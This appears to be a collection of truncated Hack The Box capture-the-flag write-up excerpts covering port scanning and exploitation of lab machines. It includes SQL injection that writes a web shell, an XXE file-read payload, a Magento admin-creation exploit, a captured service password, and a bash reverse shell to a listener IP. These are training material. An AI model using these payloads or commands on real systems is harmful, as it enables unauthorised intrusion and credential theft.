$ nmap -sV -p- goodgames.htb –min-rate 5000 http://goodgames.htb/ We can test if this site is vulnerable to an SQL Injection. If we just add a ‘, we can reach the login page with a registration form. http://internal-administration.goodgames.htb/ We don’t have credentials for this site, but as we’ve confirmed there is an sql injection let’s try to exploit it. First, we need to know how many columns exist. email=admin%40test.com’ union all

$ nmap -p- -sV 10.10.10.140 $sudo nano /etc/hosts Access to http://swagshop.htb/ As we are facing a Magento, we can use Magescan to check it. $ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar $ php magescan.phar scan:all http://swagshop.htb From the magescan report, if we find about patches, the first one is SUPEE-5344. https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patchhttps://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.htmlhttps://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py With this poc, you should be able to add an admin user. $ python3 poc.py swagshop.htb Access to http://swagshop.htb/index.php/admin The “Froghopper” Attack After

$ nmap -sV -p- 10.10.11.108 -Pn –min-rate 5000 http://10.10.11.108/ http://10.10.11.108/settings.php If we add our IP into the Server Address field: $ sudo nc -lvnp 389 We get a connection and the svc-printer password. svc-printer:1edFg43012!! You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

$ nmap -p- -v 10.10.11.116 Access to http://10.10.11.116 The listbox values are sent to the server into a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ‘ union select «» INTO OUTFILE ‘/var/www/html/shell.php’– – Now

$ nmap 10.10.10.230 -A -p- -T4 -v http://10.10.10.230/ http://10.10.10.230/register So, a user test exists.What would be the password? test??? Do we have an admin user? http://10.10.10.230/login We can try to log in with our test user. Test notes After login in, we can observe that there is an AUTH Token. We observe that it is a JWT Token. We can decode it using https://jwt.io/  Here we can observe several things: RS256

$ nmap -A 10.10.11.100 -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) http://10.10.11.100/ http://10.10.11.100/resources/README.txt http://10.10.11.100/portal.php http://10.10.11.100/log_submit.php As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef (https://gchq.github.io) on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

$ nmap -A -p- 10.10.10.239 -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

$ nmap 10.10.10.242 $ nmap 10.10.10.242 -p- -v http://10.10.10.242/ $ whatweb 10.10.10.242 $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/49933.py $ python3 49933.py $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one.https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html $ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$

$ nmap -A -p- 10.10.10.245 -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn http://10.10.10.245/ Dashboard Security Snapshot IP Config Network status Security Snapshot http://10.10.10.245/data/1 Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds.We can use it to perform a full port scan and with the results, we can use them in combination with Nmap.https://github.com/RustScan/RustScan $ rustscan -a 10.10.10.247 $ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777 In the port scan, we found different open ports.As usually, ssh port is not a common port to start testing so,